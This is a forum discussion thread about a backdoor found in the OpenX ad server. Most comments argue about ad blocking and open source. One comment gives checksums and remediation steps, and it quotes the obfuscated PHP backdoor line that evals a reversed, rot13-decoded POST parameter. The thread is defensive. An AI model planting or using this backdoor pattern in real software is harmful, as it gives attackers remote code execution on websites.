Backdoor Found In OpenX Ad Platform

mask.of.sanity writes "A backdoor has existed for at least seven months in a platform sold by OpenX, the self-described global leader of digital advertising which counts the New York Post, Coca Cola, Bloomberg and EA among its customers. The backdoor was contained within the official OpenX package and recently removed. Security researchers say it meant those who downloaded the compromised software could have provided attackers full access to their web sites."

Would you steal a Car?

[Chompjil]

So pretty much Malware ads only with full websites Also EasyList Blocks the Sucuri site

Re:Would you steal a Car?

[xQuarkDS9x]

So pretty much Malware ads only with full websites
Also EasyList Blocks the Sucuri site

And this is why I tell friends and family to run Adblock plus and keep it updated so you have a lot lower chance (if any) to see ads from websites you *believe* are safe delivering malicious code via ads.

Re: Would you steal a Car?

[0123456]

Ha-ha-ha.

At work we have a PC which runs with no ad-blocking. Opening a web site often involves staring at a blank window for thirty seconds or more with a status bar saying something like 'Waiting for ads.bollockx.com'.

If the web wasn't such an ad-infested Swamp Of Suck, people wouldn't be blocking them.

Re: Would you steal a Car?

[Russ1642]

Demonstrating the Heisenberg joke principle. Explaining or measuring the funniness of a joke instantaneously makes in no longer funny. (Also applies to sarcasm)

Re:Would you steal a Car?

[KiloByte]

EasyList has a serious flaw: it doesn't add EasyPrivacy by default. Spying servers are nearly as likely to contain extra risks as ad ones.

Re: Would you steal a Car?

[UnknownSoldier]

Quit trolling.

*I* pay for the bandwidth. Ads are stealing from *me* both in time and money.

Re: Would you steal a Car?

Then what are we stealing?

Theft, by definition, means you take the original and the prior owner *no longer* has said item.

Last I checked, not viewing ads on tv or the web doesn't mean I was stealing anything from said companies trying to sell me something.

Re:Would you steal a Car?

[aztracker1]

I use adblock plus and ghostery... though I specifically unblock google ads, and disqus... the rest is pretty much blocked... it's annoying when certain sites won't work with them enabled (I just move on).

Re: Would you steal a Car?

[RabidReindeer]

You must be the kind of person who steals candy from babies too.

Honestly, there is no legitimate reason to run Adblock if you live in an English speaking part of the world. You block, you're a thief. This is not like video interstitials on TV/youtube that waste your time by not being skip able.

The bandwidth argument can only be applied to 2.5G EDGE networks.

The real problem with OPENX is that it's the example that proves the rule that open source doesn't automatically make something better.

I appreciate a good ad. However, I'm no more interested in being assaulted by annoying ads than I am in being accosted by muggers. I don't routinely block, but if they affront me with auto-playing noisy dreck, you can bet I'm going to block them.

And tell your brat to stop crying.

Re: Would you steal a Car?

[Smauler]

Honestly, there is no legitimate reason to run Adblock if you live in an English speaking part of the world. You block, you're a thief.

I don't think I have once clicked on an ad (deliberately) online, in all of my 20 years or so of using the internet. I don't use advertisements as a decent source of information.

I've only recently started using adblock, because I see myself as a thief if I steal all the advertisers bandwidth without ever clicking or buying. They're paying for this exposure.

I generally try to buy from companies that advertise less... when you buy from companies that advertise a lot, you fund the advertisements.

It's good you've equated not looking at adverts to theft.... it makes your argument all the more persuasive.

Re: Would you steal a Car?

[Stan92057]

I already pay for content through higher prices to feed advertising budgets So do i feel bad? No a fucking chance. Get rid of ALL flashing blinking and sound ads and i will get rid of my ad blocker. There is no guarantee a ad network is clean and not serving malware/adware/viruses/spyware so screw you, my computer safety comes first. And i dont need to have what i do on the net to be spied upon just fucking ask me what i would like ya i know its too hard and costs more money boo fucken hooo.

Re: Would you steal a Car?

[mattack2]

You're paying for the *bandwidth*. You're not paying for the *content* of the web pages you are going to. They have to pay for their employees, etc. somehow. (I say this as someone who hates ads probably as much as you do.)

interestingly, has always been open source

[Trepidity]

OpenX makes an interesting example of a technically open-source project that fails to benefit from open-source much at all. It's GPL'd, but they don't support any kind of public development (no public revision-control systems or anything), and they even make you register to download the source. The page where you do so mostly just tries to convince you not to do so. A third-party site mirrors the open-source version for no-login downloads, but it seems just out of personal interest, since he's the developer of a predecessor to OpenX. It's not clear there is anybody who cares about this codebase or ever looks at it outside the company. Hence, technically open-source, but trying as hard as possible not to be.

Re:interestingly, has always been open source

[Karzz1]

While there are certain hurdles, there certainly is an officially supported revision-control system: https://svn.openx.org/

Having said that, I don't see much there that is newer than the official "community" release.

Re:interestingly, has always been open source

[Banacek]

https://github.com/openx/openx-source

Re:interestingly, has always been open source

[pHalec]

OpenX has been through many twists and turns. I started using it with my employer when it was called phpAdsNew; it then became OpenAds; then OpenX.

It gradually went from a passably supported and FOSS-minded project to a hybrid model, with the FOSS part atrophying very quickly. It became clear to us that this was a liability and we stopped using it. We're now actively avoiding hybrid models like this.

Finding a 7-month-old backdoor vindicates our suspicions.

Re:interestingly, has always been open source

[wimg]

I'm the third party you're talking about, the developer of phpAdsNew. Sadly, things took a turn for the worse when the company OpenAds (now OpenX) decided to make a business out of the advertising server. Although they've made a lot of money, the open source version has been neglected completely.

I put the download page online because I didn't like the fact that you had to register, but I'm haven't been involved in the project since 2002, so there's not much I can do about this shameful bug.

Re:interestingly, has always been open source

[sr180]

Yes - its been exploited to. I admin a site - and we were hit quite hard by this. Im amazed that its taken this long for the exploit to be acknowledged.

Everything has "Hidden Backdoors" in it...

[dryriver]

... its just a question of how long it takes - how many months or years - for the backdoor's existence to become public knowledge. ---- Once the backdoor is revealed to be there, of course, the whole thing is spun as an "unintentional software/system vulnerability". ---- Nobody ever admits that the backdoor was put where it is very much on purpose, and WITH/FOR a purpose... =) My 2 Cents...

Another reason to hate web2.0'horrea

[al0ha]

Cross domain advertising JavaScript is sooooo lame, it's required the removal of basic security implemented way back in browsers and opened the door to all kinds of miscreant behavior. I despise the Internet as a vehicle of advertising commerce.

The Internet was conceived to share ideas and information, everything else is utter BS in the name of money grubbing.

Re:Another reason to hate web2.0'horrea

[aztracker1]

I happen to prefer web-based applications to desktop apps (for most use cases)... this is essential to JS etc... Public facing web-apps are generally very useful as well... the problem is those that subvert the use... When I saw the first popover X-10 camera advertisement, I knew it was down hill from there.

Re:what the hell is openX?

[DougOtto]

Yes, Openx is a banner ad management and delivery system.

Probably just an accident (snicker)

[hyades1]

"Security researchers say it meant those who downloaded the compromised software could have provided attackers full access to their web sites."

"Security researchers say it meant those who downloaded the compromised software undoubtedly provided attackers full access to their web sites."

There...fixed that for you.

Re:Proof Ads are evil

[Noughmad]

I'll take ads I can block over Geocities websites with five fonts, eight colors and blink tags.

Fixed in openx 2.8.11

[millisa]

It is fixed in 2.8.11
http://forum.openx.org/index.php?showtopic=503521628 has openx's response.

Quick check on your servers by going to the openx base directory and doing an md5:
md5sum \
    plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js \
    plugins/deliveryLog/vastServeVideoPlayer/player.delivery.php \
    lib/max/Delivery/common.php

These md5's match the problem files:
558c80e601fb996e5f6bbc99a9ee0051 plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js
fa4991d5fd3bf4a947b6ab0b15ce10b2 plugins/deliveryLog/vastServeVideoPlayer/player.delivery.php
5014c31b479094c0b32221ae1f1473ac lib/max/Delivery/common.php

flowplayer-3.1.1.min.js is the important one.
It has
$j='explode';
$_=$j(',','strrev,str_rot13,vastPlayer');
eval($_[1]($_[0]($_POST[$_[2]])));

obfuscated in it.

The flowerplayer-3.1.1min.js file shouldn't have changed since 2.8.9. So if you have an older version, you can just drop that into place over top of the one you currently have (just make sure it doesn't have the php tag in it). My unexploited copy from the last version was dated 7-17-2012 and has the following md5
8570c9bbdd01bef2c812270e68a306b5 flowplayer-3.1.1.min.js

The update is here or if you log in to your openx administrator panel, it should show by switching to the 'Administrator' in the upper right dropdown, going to 'configuration' and to the 'product updates' section in the left hand bar.

Finding out if someone actually used it on your server would require grepping through your logs for a post to fc.php and flow player-3.1.1.min.js. (I didn't see any requests for it on my servers, so I'm guessing there's not an automated scanner for it yet).

Ad blocking

[pe1chl]

I had already blocked all ads served by openx servers (by URL regexp) long before this, after a couple of bad happenings on ad sites running openx.
It apparently is an unreliable platform. This finding only proves that.
However, I also think the ad platforms should make 5 steps back to become credible and acceptable again.
An ad server should be called from some customer-specific URL on the website and then serve a JPG or PNG with the ad. Period.
All the hoopla with javascripts fetched from different places, iframes, active content (like flash) etc has made it into an unreliable
piece of junk that just asks for being blocked. When I block it, they should not blame me but blame themselves.